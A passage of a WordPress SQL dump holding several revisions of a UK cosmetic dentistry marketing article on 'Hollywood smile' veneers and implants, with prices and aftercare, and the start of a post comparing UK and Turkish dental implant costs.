eventually fall out. If you\'ve lost teeth to gum disease you may want to consider dental implants as a much better alternative to dentures. They can improve the overall look of your smile and can even be fitted in just one appointment. <a href=\"https://dorsetdentalimplants.com/dental-implants/teeth-in-a-day-all-on-4\" target=\"_blank\" rel=\"noopener\">See more</a>.','General Dentistry Services','','inherit','closed','closed','','201-revision-v1','','','2019-12-04 16:14:59','2019-12-04 16:14:59','',201,'https://teethwhiteningproduct.co.uk/201-revision-v1',0,'revision','',0),(207,1,'2020-09-17 14:32:06','2020-09-17 14:32:06','<h1><a href=\"/\"><strong>What is a Hollywood smile?</strong></a></h1>\nA Hollywood smile is a very popular complete dental transformation. It consists of whitening and realigning the teeth to achieve a brilliant white smile. It is a smile makeover that finds the balance between natural and unnatural whiteness to create a long-lasting and natural-looking finish.\n<h4><strong>A Hollywood smile is the perfect solution for:</strong></h4>\n<ul>\n <li><em>Whitening discoloured or stained teeth</em></li>\n <li><em>Covering and protecting chipped or damaged teeth</em></li>\n <li><em>Misshapen or uneven teeth</em></li>\n <li><em>Closing gaps in between the teeth</em></li>\n <li><em>Resolving problems with teeth movement or overcrowding</em></li>\n</ul>\n<a href=\"https://www.glamourmagazine.co.uk/gallery/celebrity-teeth-pictures-before-and-after\" target=\"_blank\" rel=\"noopener\">Read more.</a>\n<h1><strong>How can I achieve a Hollywood smile?</strong></h1>\n<h3><strong>Veneers</strong></h3>\nThe Hollywood smile procedure relies on the use of veneers, which are porcelain shell-like coverings that are applied to the teeth. Veneers are able to correct any imperfections and staining in order to reinvent the smile. They are a perfectly safe and comfortable solution.\n\nKnown for their durability, porcelain veneers are the most trusted and aesthetic form of cosmetic dental treatment.\n\nComposite veneers are the most economical option for a Hollywood smile, last between 5-8 years with proper care and cost between £200-£600 per tooth.\n\nPorcelain veneers cost a little more – between £500-£1000 – however, they look more natural, and last between 10 and 15 years. If you are having a total Hollywood makeover, the price per tooth tends to be slightly lower.\n\n<a href=\"https://bespokesmile.co.uk/dental-veneers\">Learn more here.</a>\n<h3><a href=\"https://dorsetdentalimplants.com/\"><strong>Dental implants</strong></a></h3>\nIf you have a missing tooth or teeth, a dental implant is the first step in the Hollywood smile makeover. A dental implant replaces the natural root with a crown, which, typically made of porcelain, feels and looks like a natural tooth.\n\nThough a single dental implant tends to cost between £2,400 and £2,600, they are strong and durable. Their porcelain makeup means that they do not stain, and after insertion, maintenance is minimal – practising good oral hygiene is enough to keep your implant in impeccable condition.\n<h3><strong>The process:</strong></h3>\nThe process of achieving a Hollywood smile is broken down into multiple parts.\n\nThe first session is a consultation. One of our trusted dentists will conduct a thorough examination of your oral health, and your tooth and jaw structure.\n\nThen, you will bite into a mould so that the dentist can take an impression is taken of your mouth. The measurements and impressions are sent to be constructed, and you will be contacted when they are ready so that your Hollywood smile can be inserted.\n\nLearn more about the process <a href=\"https://www.healthcarebusinesstoday.com/what-is-a-hollywood-smile-procedure/\">here</a>.\n<h2><strong>Aftercare for your Hollywood smile</strong>:</h2>\n<blockquote>Looking after your Hollywood smile is simple. Following your procedure, keep practicing good oral hygiene – keep up brushing, flossing, and using an anti-bacterial mouthwash.</blockquote>\n<a href=\"https://www.nhs.uk/live-well/healthy-body/take-care-of-your-teeth-and-gums/\">Here are some top tips to help you practice good oral hygiene.</a>\n<h3><strong>How much will it cost?</strong></h3>\nA Hollywood smile dental transformation will usually cost around £7,200, however, the price may vary depending on your dentist, needs and preferences.\n\nConsult your cosmetic dentist for the best option and price plan for you.\n<blockquote>Whichever option you choose, the result will be very natural, and your smile will be fit for the red carpet!</blockquote>\n<strong>More from us:</strong>\n<ul>\n <li><a href=\"https://teethwhiteningproduct.co.uk/keeping-a-healthy-smile\">Keeping a Healthy Smile</a></li>\n <li><a href=\"https://teethwhiteningproduct.co.uk/we-are-cosmetic-dentists\">We are Cosmetic Dentists</a></li>\n <li><a href=\"https://teethwhiteningproduct.co.uk/preventive-dentistry\">Preventive Dentistry</a></li>\n <li><a href=\"https://teethwhiteningproduct.co.uk/\">Welcome to a whiter smile</a></li>\n</ul>','Hollywood Smile - revamp and transform your smile','','publish','closed','closed','','hollywood-smile-revamp-and-transform-your-smile','','','2021-05-26 11:28:16','2021-05-26 11:28:16','',0,'https://teethwhiteningproduct.co.uk/?p=207',0,'post','',0),(208,1,'2020-09-17 14:27:43','2020-09-17 14:27:43','','Hollywood smile','','inherit','closed','closed','','veneers-the-hollywood-smile-jpg','','','2020-09-17 14:28:01','2020-09-17 14:28:01','',207,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2020/09/veneers-the-hollywood-smile.jpg.jpg',0,'attachment','image/jpeg',0),(209,1,'2020-09-17 14:32:06','2020-09-17 14:32:06','<h1><a href=\"https://thegentledental.co.uk/treatment/smile-makeovers\"><img class=\"alignnone size-full wp-image-208\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2020/09/veneers-the-hollywood-smile.jpg.jpg\" alt=\"Hollywood smile\" /></a></h1>\r\n<h1><strong>What is a Hollywood smile?</strong></h1>\r\nA Hollywood smile is a very popular complete dental transformation. It consists of whitening and realigning the teeth to achieve a brilliant white smile. It is a smile makeover that finds the balance between natural and unnatural whiteness to create a long-lasting and natural-looking finish.\r\n<h4><strong>A Hollywood smile is the perfect solution for:</strong></h4>\r\n<ul>\r\n <li><em>Whitening discoloured or stained teeth</em></li>\r\n <li><em>Covering and protecting chipped or damaged teeth</em></li>\r\n <li><em>Misshapen or uneven teeth</em></li>\r\n <li><em>Closing gaps in between the teeth</em></li>\r\n <li><em>Resolving problems with teeth movement or overcrowding</em></li>\r\n</ul>\r\n \r\n<h1><strong>How can I achieve a Hollywood smile?</strong></h1>\r\n<h2><strong>Veneers</strong></h2>\r\nThe Hollywood smile procedure relies on the use of veneers, which are porcelain shell-like coverings that are applied to the teeth. Veneers are able to correct any imperfections and staining in order to reinvent the smile. They are a perfectly safe and comfortable solution.\r\n\r\nKnown for their durability, porcelain veneers are the most trusted and aesthetic form of cosmetic dental treatment.\r\n\r\nComposite veneers are the most economical option for a Hollywood smile, last between 5-8 years with proper care and cost between £200-£600 per tooth.\r\n\r\nPorcelain veneers cost a little more – between £500-£1000 – however they look more natural, and last between 10 and 15 years. If you are having a total Hollywood makeover, the price per tooth tends to be slightly lower.\r\n\r\n<a href=\"https://bespokesmile.co.uk/dental-veneers\">Learn more here.</a>\r\n<h2><strong>Dental implants</strong></h2>\r\nIf you have a missing tooth or teeth, a dental implant is the first step in the Hollywood smile makeover. A dental implant replaces the natural root with a crown, which, typically made of porcelain, feels and looks like a natural tooth.\r\n\r\nThough a single dental implant tends to cost between £2,400 and £2,600, they are strong and durable. Their porcelain makeup means that they do not stain, and after insertion, maintenance is minimal – practicing good oral hygiene is enough to keep your implant in impeccable condition.\r\n<h2><strong>The process:</strong></h2>\r\nThe process of achieving a Hollywood smile is broken down into multiple parts.\r\n\r\nThe first session is a consultation. One of our trusted dentists will conduct a thorough examination of your oral health, and your tooth and jaw structure.\r\n\r\nThen, you will bite into a mold so that the dentist can take an impression is taken of your mouth. The measurements and impressions are sent to be constructed, and you will be contacted when they are ready, so that your Hollywood smile can be inserted.\r\n\r\nLearn more about the process <a href=\"https://www.healthcarebusinesstoday.com/what-is-a-hollywood-smile-procedure/\">here</a>.\r\n<h2><strong>Aftercare for your Hollywood smile</strong>:</h2>\r\n<blockquote>Looking after your Hollywood smile is simple. Following your procedure, keep practicing good oral hygiene – keep up brushing, flossing, and using an anti-bacterial mouthwash.</blockquote>\r\n<a href=\"https://www.nhs.uk/live-well/healthy-body/take-care-of-your-teeth-and-gums/\">Here are some top tips to help you practice good oral hygiene.</a>\r\n<h3><strong>How much will it cost?</strong></h3>\r\nA Hollywood smile dental transformation will usually cost around £7,200, however, price may vary depending on your dentist, needs and preferences.\r\n\r\nConsult your cosmetic dentist for the best option and price plan for you. Whichever option you choose, the result will be very natural, and your smile will be fit for the red carpet!\r\n\r\n \r\n\r\n ','Hollywood Smile - revamp and transform your smile','','inherit','closed','closed','','207-revision-v1','','','2020-09-17 14:32:06','2020-09-17 14:32:06','',207,'https://teethwhiteningproduct.co.uk/207-revision-v1',0,'revision','',0),(211,1,'2020-09-17 14:34:20','2020-09-17 14:34:20','<h1><a href=\"https://thegentledental.co.uk/treatment/smile-makeovers\"><img class=\"alignnone size-full wp-image-208\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2020/09/veneers-the-hollywood-smile.jpg.jpg\" alt=\"Hollywood smile\" /></a></h1>\r\n<h1><strong>What is a Hollywood smile?</strong></h1>\r\nA Hollywood smile is a very popular complete dental transformation. It consists of whitening and realigning the teeth to achieve a brilliant white smile. It is a smile makeover that finds the balance between natural and unnatural whiteness to create a long-lasting and natural-looking finish.\r\n<h4><strong>A Hollywood smile is the perfect solution for:</strong></h4>\r\n<ul>\r\n <li><em>Whitening discoloured or stained teeth</em></li>\r\n <li><em>Covering and protecting chipped or damaged teeth</em></li>\r\n <li><em>Misshapen or uneven teeth</em></li>\r\n <li><em>Closing gaps in between the teeth</em></li>\r\n <li><em>Resolving problems with teeth movement or overcrowding</em></li>\r\n</ul>\r\n<a href=\"https://thegentledental.co.uk/treatment/smile-makeovers\">Read more.</a>\r\n<h1><strong>How can I achieve a Hollywood smile?</strong></h1>\r\n<h2><strong>Veneers</strong></h2>\r\nThe Hollywood smile procedure relies on the use of veneers, which are porcelain shell-like coverings that are applied to the teeth. Veneers are able to correct any imperfections and staining in order to reinvent the smile. They are a perfectly safe and comfortable solution.\r\n\r\nKnown for their durability, porcelain veneers are the most trusted and aesthetic form of cosmetic dental treatment.\r\n\r\nComposite veneers are the most economical option for a Hollywood smile, last between 5-8 years with proper care and cost between £200-£600 per tooth.\r\n\r\nPorcelain veneers cost a little more – between £500-£1000 – however they look more natural, and last between 10 and 15 years. If you are having a total Hollywood makeover, the price per tooth tends to be slightly lower.\r\n\r\n<a href=\"https://bespokesmile.co.uk/dental-veneers\">Learn more here.</a>\r\n<h2><strong>Dental implants</strong></h2>\r\nIf you have a missing tooth or teeth, a dental implant is the first step in the Hollywood smile makeover. A dental implant replaces the natural root with a crown, which, typically made of porcelain, feels and looks like a natural tooth.\r\n\r\nThough a single dental implant tends to cost between £2,400 and £2,600, they are strong and durable. Their porcelain makeup means that they do not stain, and after insertion, maintenance is minimal – practicing good oral hygiene is enough to keep your implant in impeccable condition.\r\n<h2><strong>The process:</strong></h2>\r\nThe process of achieving a Hollywood smile is broken down into multiple parts.\r\n\r\nThe first session is a consultation. One of our trusted dentists will conduct a thorough examination of your oral health, and your tooth and jaw structure.\r\n\r\nThen, you will bite into a mold so that the dentist can take an impression is taken of your mouth. The measurements and impressions are sent to be constructed, and you will be contacted when they are ready, so that your Hollywood smile can be inserted.\r\n\r\nLearn more about the process <a href=\"https://www.healthcarebusinesstoday.com/what-is-a-hollywood-smile-procedure/\">here</a>.\r\n<h2><strong>Aftercare for your Hollywood smile</strong>:</h2>\r\n<blockquote>Looking after your Hollywood smile is simple. Following your procedure, keep practicing good oral hygiene – keep up brushing, flossing, and using an anti-bacterial mouthwash.</blockquote>\r\n<a href=\"https://www.nhs.uk/live-well/healthy-body/take-care-of-your-teeth-and-gums/\">Here are some top tips to help you practice good oral hygiene.</a>\r\n<h3><strong>How much will it cost?</strong></h3>\r\nA Hollywood smile dental transformation will usually cost around £7,200, however, price may vary depending on your dentist, needs and preferences.\r\n\r\nConsult your cosmetic dentist for the best option and price plan for you. Whichever option you choose, the result will be very natural, and your smile will be fit for the red carpet!\r\n\r\n \r\n\r\n ','Hollywood Smile - revamp and transform your smile','','inherit','closed','closed','','207-revision-v1','','','2020-09-17 14:34:20','2020-09-17 14:34:20','',207,'https://teethwhiteningproduct.co.uk/207-revision-v1',0,'revision','',0),(212,1,'2020-09-17 14:34:50','2020-09-17 14:34:50','<h1><a href=\"https://thegentledental.co.uk/treatment/smile-makeovers\"><img class=\"alignnone size-full wp-image-208\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2020/09/veneers-the-hollywood-smile.jpg.jpg\" alt=\"Hollywood smile\" /></a></h1>\r\n<h1><strong>What is a Hollywood smile?</strong></h1>\r\nA Hollywood smile is a very popular complete dental transformation. It consists of whitening and realigning the teeth to achieve a brilliant white smile. It is a smile makeover that finds the balance between natural and unnatural whiteness to create a long-lasting and natural-looking finish.\r\n<h4><strong>A Hollywood smile is the perfect solution for:</strong></h4>\r\n<ul>\r\n <li><em>Whitening discoloured or stained teeth</em></li>\r\n <li><em>Covering and protecting chipped or damaged teeth</em></li>\r\n <li><em>Misshapen or uneven teeth</em></li>\r\n <li><em>Closing gaps in between the teeth</em></li>\r\n <li><em>Resolving problems with teeth movement or overcrowding</em></li>\r\n</ul>\r\n<a href=\"https://thegentledental.co.uk/treatment/smile-makeovers\">Read more.</a>\r\n<h1><strong>How can I achieve a Hollywood smile?</strong></h1>\r\n<h3><strong>Veneers</strong></h3>\r\nThe Hollywood smile procedure relies on the use of veneers, which are porcelain shell-like coverings that are applied to the teeth. Veneers are able to correct any imperfections and staining in order to reinvent the smile. They are a perfectly safe and comfortable solution.\r\n\r\nKnown for their durability, porcelain veneers are the most trusted and aesthetic form of cosmetic dental treatment.\r\n\r\nComposite veneers are the most economical option for a Hollywood smile, last between 5-8 years with proper care and cost between £200-£600 per tooth.\r\n\r\nPorcelain veneers cost a little more – between £500-£1000 – however they look more natural, and last between 10 and 15 years. If you are having a total Hollywood makeover, the price per tooth tends to be slightly lower.\r\n\r\n<a href=\"https://bespokesmile.co.uk/dental-veneers\">Learn more here.</a>\r\n<h3><strong>Dental implants</strong></h3>\r\nIf you have a missing tooth or teeth, a dental implant is the first step in the Hollywood smile makeover. A dental implant replaces the natural root with a crown, which, typically made of porcelain, feels and looks like a natural tooth.\r\n\r\nThough a single dental implant tends to cost between £2,400 and £2,600, they are strong and durable. Their porcelain makeup means that they do not stain, and after insertion, maintenance is minimal – practicing good oral hygiene is enough to keep your implant in impeccable condition.\r\n<h3><strong>The process:</strong></h3>\r\nThe process of achieving a Hollywood smile is broken down into multiple parts.\r\n\r\nThe first session is a consultation. One of our trusted dentists will conduct a thorough examination of your oral health, and your tooth and jaw structure.\r\n\r\nThen, you will bite into a mold so that the dentist can take an impression is taken of your mouth. The measurements and impressions are sent to be constructed, and you will be contacted when they are ready, so that your Hollywood smile can be inserted.\r\n\r\nLearn more about the process <a href=\"https://www.healthcarebusinesstoday.com/what-is-a-hollywood-smile-procedure/\">here</a>.\r\n<h2><strong>Aftercare for your Hollywood smile</strong>:</h2>\r\n<blockquote>Looking after your Hollywood smile is simple. Following your procedure, keep practicing good oral hygiene – keep up brushing, flossing, and using an anti-bacterial mouthwash.</blockquote>\r\n<a href=\"https://www.nhs.uk/live-well/healthy-body/take-care-of-your-teeth-and-gums/\">Here are some top tips to help you practice good oral hygiene.</a>\r\n<h3><strong>How much will it cost?</strong></h3>\r\nA Hollywood smile dental transformation will usually cost around £7,200, however, price may vary depending on your dentist, needs and preferences.\r\n\r\nConsult your cosmetic dentist for the best option and price plan for you. Whichever option you choose, the result will be very natural, and your smile will be fit for the red carpet!\r\n\r\n \r\n\r\n ','Hollywood Smile - revamp and transform your smile','','inherit','closed','closed','','207-revision-v1','','','2020-09-17 14:34:50','2020-09-17 14:34:50','',207,'https://teethwhiteningproduct.co.uk/207-revision-v1',0,'revision','',0),(213,1,'2020-09-17 14:35:16','2020-09-17 14:35:16','<h1><a href=\"https://thegentledental.co.uk/treatment/smile-makeovers\"><img class=\"alignnone size-full wp-image-208\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2020/09/veneers-the-hollywood-smile.jpg.jpg\" alt=\"Hollywood smile\" /></a></h1>\r\n<h1><strong>What is a Hollywood smile?</strong></h1>\r\nA Hollywood smile is a very popular complete dental transformation. It consists of whitening and realigning the teeth to achieve a brilliant white smile. It is a smile makeover that finds the balance between natural and unnatural whiteness to create a long-lasting and natural-looking finish.\r\n<h4><strong>A Hollywood smile is the perfect solution for:</strong></h4>\r\n<ul>\r\n <li><em>Whitening discoloured or stained teeth</em></li>\r\n <li><em>Covering and protecting chipped or damaged teeth</em></li>\r\n <li><em>Misshapen or uneven teeth</em></li>\r\n <li><em>Closing gaps in between the teeth</em></li>\r\n <li><em>Resolving problems with teeth movement or overcrowding</em></li>\r\n</ul>\r\n<a href=\"https://thegentledental.co.uk/treatment/smile-makeovers\">Read more.</a>\r\n<h1><strong>How can I achieve a Hollywood smile?</strong></h1>\r\n<h3><strong>Veneers</strong></h3>\r\nThe Hollywood smile procedure relies on the use of veneers, which are porcelain shell-like coverings that are applied to the teeth. Veneers are able to correct any imperfections and staining in order to reinvent the smile. They are a perfectly safe and comfortable solution.\r\n\r\nKnown for their durability, porcelain veneers are the most trusted and aesthetic form of cosmetic dental treatment.\r\n\r\nComposite veneers are the most economical option for a Hollywood smile, last between 5-8 years with proper care and cost between £200-£600 per tooth.\r\n\r\nPorcelain veneers cost a little more – between £500-£1000 – however they look more natural, and last between 10 and 15 years. If you are having a total Hollywood makeover, the price per tooth tends to be slightly lower.\r\n\r\n<a href=\"https://bespokesmile.co.uk/dental-veneers\">Learn more here.</a>\r\n<h3><strong>Dental implants</strong></h3>\r\nIf you have a missing tooth or teeth, a dental implant is the first step in the Hollywood smile makeover. A dental implant replaces the natural root with a crown, which, typically made of porcelain, feels and looks like a natural tooth.\r\n\r\nThough a single dental implant tends to cost between £2,400 and £2,600, they are strong and durable. Their porcelain makeup means that they do not stain, and after insertion, maintenance is minimal – practicing good oral hygiene is enough to keep your implant in impeccable condition.\r\n<h3><strong>The process:</strong></h3>\r\nThe process of achieving a Hollywood smile is broken down into multiple parts.\r\n\r\nThe first session is a consultation. One of our trusted dentists will conduct a thorough examination of your oral health, and your tooth and jaw structure.\r\n\r\nThen, you will bite into a mold so that the dentist can take an impression is taken of your mouth. The measurements and impressions are sent to be constructed, and you will be contacted when they are ready, so that your Hollywood smile can be inserted.\r\n\r\nLearn more about the process <a href=\"https://www.healthcarebusinesstoday.com/what-is-a-hollywood-smile-procedure/\">here</a>.\r\n<h2><strong>Aftercare for your Hollywood smile</strong>:</h2>\r\n<blockquote>Looking after your Hollywood smile is simple. Following your procedure, keep practicing good oral hygiene – keep up brushing, flossing, and using an anti-bacterial mouthwash.</blockquote>\r\n<a href=\"https://www.nhs.uk/live-well/healthy-body/take-care-of-your-teeth-and-gums/\">Here are some top tips to help you practice good oral hygiene.</a>\r\n<h3><strong>How much will it cost?</strong></h3>\r\nA Hollywood smile dental transformation will usually cost around £7,200, however, price may vary depending on your dentist, needs and preferences.\r\n\r\nConsult your cosmetic dentist for the best option and price plan for you.\r\n<blockquote>Whichever option you choose, the result will be very natural, and your smile will be fit for the red carpet!</blockquote>\r\n \r\n\r\n ','Hollywood Smile - revamp and transform your smile','','inherit','closed','closed','','207-revision-v1','','','2020-09-17 14:35:16','2020-09-17 14:35:16','',207,'https://teethwhiteningproduct.co.uk/207-revision-v1',0,'revision','',0),(216,1,'2021-05-26 11:28:09','2021-05-26 11:28:09','<h1><a href=\"/\"><strong>What is a Hollywood smile?</strong></a></h1>\nA Hollywood smile is a very popular complete dental transformation. It consists of whitening and realigning the teeth to achieve a brilliant white smile. It is a smile makeover that finds the balance between natural and unnatural whiteness to create a long-lasting and natural-looking finish.\n<h4><strong>A Hollywood smile is the perfect solution for:</strong></h4>\n<ul>\n <li><em>Whitening discoloured or stained teeth</em></li>\n <li><em>Covering and protecting chipped or damaged teeth</em></li>\n <li><em>Misshapen or uneven teeth</em></li>\n <li><em>Closing gaps in between the teeth</em></li>\n <li><em>Resolving problems with teeth movement or overcrowding</em></li>\n</ul>\n<a href=\"https://www.glamourmagazine.co.uk/gallery/celebrity-teeth-pictures-before-and-after\" target=\"_blank\" rel=\"noopener\">Read more.</a>\n<h1><strong>How can I achieve a Hollywood smile?</strong></h1>\n<h3><strong>Veneers</strong></h3>\nThe Hollywood smile procedure relies on the use of veneers, which are porcelain shell-like coverings that are applied to the teeth. Veneers are able to correct any imperfections and staining in order to reinvent the smile. They are a perfectly safe and comfortable solution.\n\nKnown for their durability, porcelain veneers are the most trusted and aesthetic form of cosmetic dental treatment.\n\nComposite veneers are the most economical option for a Hollywood smile, last between 5-8 years with proper care and cost between £200-£600 per tooth.\n\nPorcelain veneers cost a little more – between £500-£1000 – however, they look more natural, and last between 10 and 15 years. If you are having a total Hollywood makeover, the price per tooth tends to be slightly lower.\n\n<a href=\"https://bespokesmile.co.uk/dental-veneers\">Learn more here.</a>\n<h3><a href=\"https://dorsetdentalimplants.com/\"><strong>Dental implants</strong></a></h3>\nIf you have a missing tooth or teeth, a dental implant is the first step in the Hollywood smile makeover. A dental implant replaces the natural root with a crown, which, typically made of porcelain, feels and looks like a natural tooth.\n\nThough a single dental implant tends to cost between £2,400 and £2,600, they are strong and durable. Their porcelain makeup means that they do not stain, and after insertion, maintenance is minimal – practising good oral hygiene is enough to keep your implant in impeccable condition.\n<h3><strong>The process:</strong></h3>\nThe process of achieving a Hollywood smile is broken down into multiple parts.\n\nThe first session is a consultation. One of our trusted dentists will conduct a thorough examination of your oral health, and your tooth and jaw structure.\n\nThen, you will bite into a mould so that the dentist can take an impression is taken of your mouth. The measurements and impressions are sent to be constructed, and you will be contacted when they are ready so that your Hollywood smile can be inserted.\n\nLearn more about the process <a href=\"https://www.healthcarebusinesstoday.com/what-is-a-hollywood-smile-procedure/\">here</a>.\n<h2><strong>Aftercare for your Hollywood smile</strong>:</h2>\n<blockquote>Looking after your Hollywood smile is simple. Following your procedure, keep practicing good oral hygiene – keep up brushing, flossing, and using an anti-bacterial mouthwash.</blockquote>\n<a href=\"https://www.nhs.uk/live-well/healthy-body/take-care-of-your-teeth-and-gums/\">Here are some top tips to help you practice good oral hygiene.</a>\n<h3><strong>How much will it cost?</strong></h3>\nA Hollywood smile dental transformation will usually cost around £7,200, however, the price may vary depending on your dentist, needs and preferences.\n\nConsult your cosmetic dentist for the best option and price plan for you.\n<blockquote>Whichever option you choose, the result will be very natural, and your smile will be fit for the red carpet!</blockquote>\n<strong>More from us:</strong>\n<ul>\n <li><a href=\"https://teethwhiteningproduct.co.uk/keeping-a-healthy-smile\">Keeping a Healthy Smile</a></li>\n <li><a href=\"https://teethwhiteningproduct.co.uk/we-are-cosmetic-dentists\">We are Cosmetic Dentists</a></li>\n <li><a href=\"https://teethwhiteningproduct.co.uk/preventive-dentistry\">Preventive Dentistry</a></li>\n <li><a href=\"https://teethwhiteningproduct.co.uk/\">Welcome to a whiter smile</a></li>\n</ul>','Hollywood Smile - revamp and transform your smile','','inherit','closed','closed','','207-autosave-v1','','','2021-05-26 11:28:09','2021-05-26 11:28:09','',207,'https://teethwhiteningproduct.co.uk/207-autosave-v1',0,'revision','',0),(217,1,'2021-05-26 11:28:16','2021-05-26 11:28:16','<h1><a href=\"/\"><strong>What is a Hollywood smile?</strong></a></h1>\nA Hollywood smile is a very popular complete dental transformation. It consists of whitening and realigning the teeth to achieve a brilliant white smile. It is a smile makeover that finds the balance between natural and unnatural whiteness to create a long-lasting and natural-looking finish.\n<h4><strong>A Hollywood smile is the perfect solution for:</strong></h4>\n<ul>\n <li><em>Whitening discoloured or stained teeth</em></li>\n <li><em>Covering and protecting chipped or damaged teeth</em></li>\n <li><em>Misshapen or uneven teeth</em></li>\n <li><em>Closing gaps in between the teeth</em></li>\n <li><em>Resolving problems with teeth movement or overcrowding</em></li>\n</ul>\n<a href=\"https://www.glamourmagazine.co.uk/gallery/celebrity-teeth-pictures-before-and-after\" target=\"_blank\" rel=\"noopener\">Read more.</a>\n<h1><strong>How can I achieve a Hollywood smile?</strong></h1>\n<h3><strong>Veneers</strong></h3>\nThe Hollywood smile procedure relies on the use of veneers, which are porcelain shell-like coverings that are applied to the teeth. Veneers are able to correct any imperfections and staining in order to reinvent the smile. They are a perfectly safe and comfortable solution.\n\nKnown for their durability, porcelain veneers are the most trusted and aesthetic form of cosmetic dental treatment.\n\nComposite veneers are the most economical option for a Hollywood smile, last between 5-8 years with proper care and cost between £200-£600 per tooth.\n\nPorcelain veneers cost a little more – between £500-£1000 – however, they look more natural, and last between 10 and 15 years. If you are having a total Hollywood makeover, the price per tooth tends to be slightly lower.\n\n<a href=\"https://bespokesmile.co.uk/dental-veneers\">Learn more here.</a>\n<h3><a href=\"https://dorsetdentalimplants.com/\"><strong>Dental implants</strong></a></h3>\nIf you have a missing tooth or teeth, a dental implant is the first step in the Hollywood smile makeover. A dental implant replaces the natural root with a crown, which, typically made of porcelain, feels and looks like a natural tooth.\n\nThough a single dental implant tends to cost between £2,400 and £2,600, they are strong and durable. Their porcelain makeup means that they do not stain, and after insertion, maintenance is minimal – practising good oral hygiene is enough to keep your implant in impeccable condition.\n<h3><strong>The process:</strong></h3>\nThe process of achieving a Hollywood smile is broken down into multiple parts.\n\nThe first session is a consultation. One of our trusted dentists will conduct a thorough examination of your oral health, and your tooth and jaw structure.\n\nThen, you will bite into a mould so that the dentist can take an impression is taken of your mouth. The measurements and impressions are sent to be constructed, and you will be contacted when they are ready so that your Hollywood smile can be inserted.\n\nLearn more about the process <a href=\"https://www.healthcarebusinesstoday.com/what-is-a-hollywood-smile-procedure/\">here</a>.\n<h2><strong>Aftercare for your Hollywood smile</strong>:</h2>\n<blockquote>Looking after your Hollywood smile is simple. Following your procedure, keep practicing good oral hygiene – keep up brushing, flossing, and using an anti-bacterial mouthwash.</blockquote>\n<a href=\"https://www.nhs.uk/live-well/healthy-body/take-care-of-your-teeth-and-gums/\">Here are some top tips to help you practice good oral hygiene.</a>\n<h3><strong>How much will it cost?</strong></h3>\nA Hollywood smile dental transformation will usually cost around £7,200, however, the price may vary depending on your dentist, needs and preferences.\n\nConsult your cosmetic dentist for the best option and price plan for you.\n<blockquote>Whichever option you choose, the result will be very natural, and your smile will be fit for the red carpet!</blockquote>\n<strong>More from us:</strong>\n<ul>\n <li><a href=\"https://teethwhiteningproduct.co.uk/keeping-a-healthy-smile\">Keeping a Healthy Smile</a></li>\n <li><a href=\"https://teethwhiteningproduct.co.uk/we-are-cosmetic-dentists\">We are Cosmetic Dentists</a></li>\n <li><a href=\"https://teethwhiteningproduct.co.uk/preventive-dentistry\">Preventive Dentistry</a></li>\n <li><a href=\"https://teethwhiteningproduct.co.uk/\">Welcome to a whiter smile</a></li>\n</ul>','Hollywood Smile - revamp and transform your smile','','inherit','closed','closed','','207-revision-v1','','','2021-05-26 11:28:16','2021-05-26 11:28:16','',207,'https://teethwhiteningproduct.co.uk/207-revision-v1',0,'revision','',0),(218,1,'2021-05-26 11:34:19','2021-05-26 11:34:19','<!-- wp:heading -->\n<h2><a href=\"/\">The Quality Difference</a></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>The idea of losing teeth and having unsightly gaps in our smile is never something anyone wants to encounter.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Multiple missing teeth can not only affect our self-confidence in our appearance but also have negative medical consequences for our oral health in the long term through the increased risk of infection. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Luckily, there is a popular, safe and surprisingly affordable resolution to the problem of missing teeth. Dental implants are a common procedure that is offered by most dentists practicing in the UK today.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3>How much?</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Dental implants can vary considerably in cost, depending on the complexity of the case, the number of missing teeth and the general state of your oral health.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>BUPA calculates that the <a href=\"https://www.bupa.co.uk/dental/dental-care/treatments/implants-dentures-bridges/dental-implants/cost#:~:text=the%20average%20cost%20of%20a%20single%20implant%20in%20the%20uk%20is%20%C2%A32%2C415\" target=\"_blank\" rel=\"noreferrer noopener\">average cost</a> of a dental implant in the UK is <strong>£2,415</strong>. This represents a serious amount of money for a cosmetic procedure that is rarely covered by dental insurance.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3><strong>The risk of cutting costs</strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>The figure of nearly £2,500 for a single tooth replacement might sound like too much, and even a small amount of research will show you that there are significantly cheaper options available abroad, in countries like Turkey.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>There are private dental practices in Turkey that offer single dental implants for as little as <a rel=\"noreferrer noopener\" href=\"https://www.dentalcentreturkey.com/dental-treatment-prices-in-turkey#:~:text=ALPHA,%C2%A3460\" target=\"_blank\">£460</a>, which on the surface appears to be a real bargain when compared to the UK market. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Compare:</strong> Dental implant cost from a UK dentist <a href=\"https://thegentledental.co.uk/dental-implants\" data-type=\"URL\" data-id=\"https://thegentledental.co.uk/dental-implants\" target=\"_blank\" rel=\"noreferrer noopener\">here</a>.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, there are several reasons for the stark difference in price which are worth knowing about. The most expensive elements of dental implants are quality materials and qualified dentists.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Turkey and other countries in Eastern Europe suffer from:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>A generally lower standard of regulation of the dental industry</li><li>Widespread use of low-quality materials</li><li>A significantly greater risk of failure and the need for expensive follow-up treatment</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3>You get what you pay for</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>In the UK, when it comes to dentistry, you get what you pay for. High-quality dentistry may not be the cheapest thing going, but 